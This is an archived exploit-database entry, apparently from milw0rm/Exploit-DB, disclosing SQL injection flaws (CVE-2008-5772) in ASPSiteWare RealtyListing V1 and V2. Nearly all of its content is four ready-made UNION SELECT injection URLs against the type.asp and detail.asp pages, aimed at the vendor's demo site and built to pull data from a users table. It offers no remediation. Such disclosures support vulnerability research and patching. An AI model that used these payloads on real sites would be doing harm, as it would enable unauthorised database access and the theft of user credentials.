ASPSiteWare RealtyListing V1/V2 SQL Injection Vulnerabilities

EDB-ID: 7464	CVE: 2008-5772	OSVDB-ID: 50707
Author: AlpHaNiX	Published: 2008-12-14	Verified:
Exploit Code:	Vulnerable App: N/A

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################
#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ
###########################################################################
#script   : RealtyListing V1/V2
#download : null
#Demo     : http://www.aspsiteware.com/Realty1
	    http://www.aspsiteware.com/realty2/realty2/
###########################################################################
#Exploits :
--=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
###########################################################################
# milw0rm.com [2008-12-14]

Comments

ASPSiteWare RealtyListing V1/V2 SQL Injection Vulnerabilities

Rating

No comments so far